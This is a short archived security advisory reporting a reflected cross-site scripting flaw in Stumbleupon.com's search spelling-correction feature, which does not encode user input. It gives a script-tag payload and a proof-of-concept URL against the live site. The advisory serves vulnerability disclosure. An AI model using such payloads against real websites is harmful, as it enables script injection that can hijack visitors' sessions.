Stumbleupon.com Cross Site Scripting

2010-04-27T00:00:00
ID PACKETSTORM:88970
Type packetstorm
Reporter AutoSec Tools
Modified 2010-04-27T00:00:00

Description

                                        
                                            `|=================================================================================================|  
| ___ ___ ___ ___ ___ ___ |  
| /\ \ /\ \ /\__\ ___ /\ \ /\ \ /\ \ |  
| /::\ \ /::\ \ /::| | /\ \ /::\ \ /::\ \ /::\ \ |  
| /:/\:\ \ /:/\:\ \ /:|:| | \:\ \ /:/\:\ \ /:/\:\ \ /:/\:\ \ |  
| /:/ \:\ \ /:/ \:\ \ /:/|:| |__ /::\__\ /::\~\:\ \ /::\~\:\ \ /::\~\:\ \ |  
| /:/__/ \:\__\ /:/__/ \:\__\ /:/ |:| /\__\ __/:/\/__/ /:/\:\ \:\__\ /:/\:\ \:\__\ /:/\:\ \:\__\ |  
| \:\ \ \/__/ \:\ \ /:/ / \/__|:|/:/ / /\/:/ / \/__\:\ \/__/ \:\~\:\ \/__/ \/_|::\/:/ / |  
| \:\ \ \:\ /:/ / |:/:/ / \::/__/ \:\__\ \:\ \:\__\ |:|::/ / |  
| \:\ \ \:\/:/ / |::/ / \:\__\ \/__/ \:\ \/__/ |:|\/__/ |  
| \:\__\ \::/ / /:/ / \/__/ \:\__\ |:| | |  
| \/__/ \/__/ \/__/ \/__/ \|__| |  
| |  
|=================================================================================================|  
| |  
| Vulnerability............Reflected XSS |  
| Software.................Stumbleupon.com |  
| Date.....................4/26/10 |  
| Site.....................http://cross-site-scripting.blogspot.com/ |  
| |  
|=================================================================================================|  
| |  
| ##Description## |  
| |  
| The code that displays spelling corrections does not encode user submitted data. |  
| |  
| |  
| ##Exploit## |  
| |  
| teh<script>alert(0)</script> |  
| |  
| |  
| ##Proof of Concept## |  
| |  
| http://www.stumbleupon.com/search?q=teh<script>alert(0)</script> |  
| |  
|=================================================================================================|  
`